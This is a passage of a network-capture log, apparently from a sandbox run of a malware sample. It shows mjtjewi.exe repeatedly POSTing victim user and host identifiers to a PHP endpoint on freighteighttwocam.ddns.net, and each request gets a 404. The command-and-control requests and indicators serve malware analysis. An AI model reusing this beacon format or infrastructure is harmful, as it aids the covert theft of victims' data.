Oct 3, 2024 09:20:48.138102055 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rutotti210979TOTTI-PCk0FDD42EE188E931437F4FBE2CUzlbc
Oct 3, 2024 09:20:49.077418089 CEST	169	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49712	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:49.388974905 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 176 Connection: close
Oct 3, 2024 09:20:49.427131891 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rutotti210979TOTTI-PC+0FDD42EE188E931437F4FBE2CTjeqH
Oct 3, 2024 09:20:50.285749912 CEST	169	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49713	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:50.390712023 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:20:50.395967960 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:20:51.444361925 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 3, 2024 09:20:51.445071936 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49714	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:52.127427101 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:20:52.138115883 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:20:52.895509005 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49715	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:53.054243088 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:20:53.059613943 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:20:55.154339075 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49717	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:55.306317091 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:20:55.313220024 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:20:56.378058910 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49718	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:56.539355040 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:20:56.544536114 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:20:57.546360970 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	55843	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:58.060252905 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:20:58.316168070 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:20:59.117296934 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	64348	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:20:59.267592907 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:20:59.272737026 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:00.351605892 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:20:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.11	64350	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:00.665224075 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:00.670902967 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:01.453564882 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.11	64352	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:01.618191004 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:01.623466969 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:02.292433023 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.11	64354	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:02.443226099 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:02.448704004 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:03.191437006 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.11	64355	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:03.482903957 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:03.488048077 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:04.262743950 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.11	64357	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:04.423429966 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:04.428361893 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:05.200607061 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.11	64358	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:05.354207039 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:05.363792896 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:06.209109068 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.11	64359	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:06.380893946 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:06.386274099 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:07.095535040 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.11	64360	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:07.258128881 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:07.265208006 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:08.057806969 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.11	64361	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:08.219978094 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:08.224948883 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:08.908827066 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.11	64362	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:09.167659998 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:09.172629118 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:09.839379072 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.11	64363	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:09.991626978 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:09.997520924 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:10.836468935 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.11	64364	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:10.991457939 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
Oct 3, 2024 09:21:10.996788025 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
Oct 3, 2024 09:21:11.917808056 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Oct 3, 2024 09:21:11.918284893 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Thu, 03 Oct 2024 07:21:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.11	64365	45.149.241.169	80	1392	C:\Users\user\Desktop\mjtjewi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 09:21:12.107372999 CEST	262	OUT	POST /mdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: freighteighttwocam.ddns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 5EE1FC9E Content-Length: 149 Connection: close
